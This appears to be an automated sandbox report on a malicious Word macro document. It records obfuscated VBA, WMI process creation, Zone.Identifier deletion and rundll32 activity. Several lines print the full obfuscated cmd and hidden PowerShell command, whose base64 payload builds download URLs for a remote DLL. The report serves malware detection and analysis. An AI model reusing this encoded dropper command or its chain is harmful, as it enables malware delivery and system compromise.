Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: N00048481397007.doc Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi Name: Gp0t5ucwnkng7fi
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF100B push ss; iretd 7_2_01FF100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F090 push edx; ret 7_2_0024F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023057F push ss; iretd 7_2_00230580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02042D98 push 02042E25h; ret 7_2_02042E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201B274 push 0201B2CDh; ret 7_2_0201B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0202C34C push 0202C378h; ret 7_2_0202C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050020 push 02050058h; ret 7_2_02050050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02044038 push 02044064h; ret 7_2_0204405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201A0B2 push 0201A0E0h; ret 7_2_0201A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201A0B4 push 0201A0E0h; ret 7_2_0201A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050654 push 02050680h; ret 7_2_02050678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0205068C push 020506B8h; ret 7_2_020506B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E696 push ecx; mov dword ptr [esp], edx 7_2_0201E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020506C4 push 020506F0h; ret 7_2_020506E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201D6DC push 0201D751h; ret 7_2_0201D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E6F0 push ecx; mov dword ptr [esp], edx 7_2_0201E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02018748 push 02018774h; ret 7_2_0201876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E750 push ecx; mov dword ptr [esp], edx 7_2_0201E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201D754 push 0201D7ADh; ret 7_2_0201D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02018798 push 020187C4h; ret 7_2_020187BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020537A8 push 020537E0h; ret 7_2_020537D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020507E4 push 02050827h; ret 7_2_0205081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201E450 push ecx; mov dword ptr [esp], edx 7_2_0201E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050498 push 020504EFh; ret 7_2_020504E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020504F4 push 0205055Ch; ret 7_2_02050554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02050580 push 020505ACh; ret 7_2_020505A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0204B588 push 0204B5CAh; ret 7_2_0204B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020505B8 push 020505E4h; ret 7_2_020505DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020505F0 push 0205063Ch; ret 7_2_02050634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0201B5F8 push 0201B92Fh; ret 7_2_0201B927
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0204CA20 push 0204CA58h; ret 7_2_0204CA50

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
